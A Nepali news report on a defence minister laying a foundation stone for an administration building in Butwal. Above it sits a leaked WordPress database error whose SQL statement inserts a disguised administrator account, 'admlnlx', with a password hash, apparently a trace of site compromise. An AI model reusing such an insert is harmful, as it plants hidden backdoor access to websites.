WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.lh.mIpSs53DukSHUolGlxRTyxSVZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 03:35:16', '', 'admlnlx', 'admlnlx')
बुटवल,माघ १९-
रक्षामन्त्री बालकृष्ण खाँणले विकासमा सबैको सहकार्य आवश्यक रहेको बताएका छन्। ‘देशको विकास र समृद्धिका लागि सबैको सहभागिता आवश्यक छ, बुटवलस्थित इलाका प्रशासन कार्यालयको आज एक समारोहबीच भवन शिलान्यास गर्दै उनले भने, ‘सबै पक्षको सहकार्यबाट नै लुम्बिनी क्षेत्रका विकास अघि बढेको छ।’ मन्त्री खाँणले यस क्षेत्रको विकासका लागि सबै जनप्रतिनिधिले राजनीति भन्दामाथि उठेर सहकार्यका साथ अगाडि बढेको चर्चा गर्दै रुपन्देहीको विकासका सरकार प्रतिवद्ध रहेको बताए।
लुम्बिनीलाई केन्द्रमा राखेर ५ नं प्रदेश बनाउनुपर्ने र यो प्रदेशबाट पहाडलार्य अलग गर्न हुदैन्, उनले भने–‘लुम्बिनीलाई प्राकृतिक स्रोत साधनमा पहुँच राख्न पनि पहाडी जिल्लासँगको सम्बन्ध जरुरी छ ।’ मन्त्री खाँणले प्रशासन भवन निर्माणका लागि बजेटको कुनै अभाव हुन नदिने बताउँदै भवनको गुणस्तर र निर्धारित समयमै सम्पन्न गर्न निर्देशन समेत दिए। चार करोड ८८ लाखको लागतमा सो भवन निर्माण हुँदैछ । पहिलो चरणमा दुई तले कार्यालय भवन निर्माण हुने र दोस्रो चरणमा कर्मचारी आवास निर्माण गरिने इलाका प्रशासन कार्यालय बुटवलका प्रमुख कृष्णप्रसाद भण्डारीले जानकारी दिए।
कार्यक्रममा भवन डिभिजन कार्यालय रुपन्देहीका प्राविधिक इन्जिनियर सुरेश खनालले निर्माणाधिन भवनका विविध पक्षमाथि प्रकाश पारेका थिए। रुपन्देहीका प्रमुख जिल्ला अधिकारी विनोद प्रकाश सिंहको अध्यक्षतामा कार्यक्रम सम्पन्न भएको थियो । रासस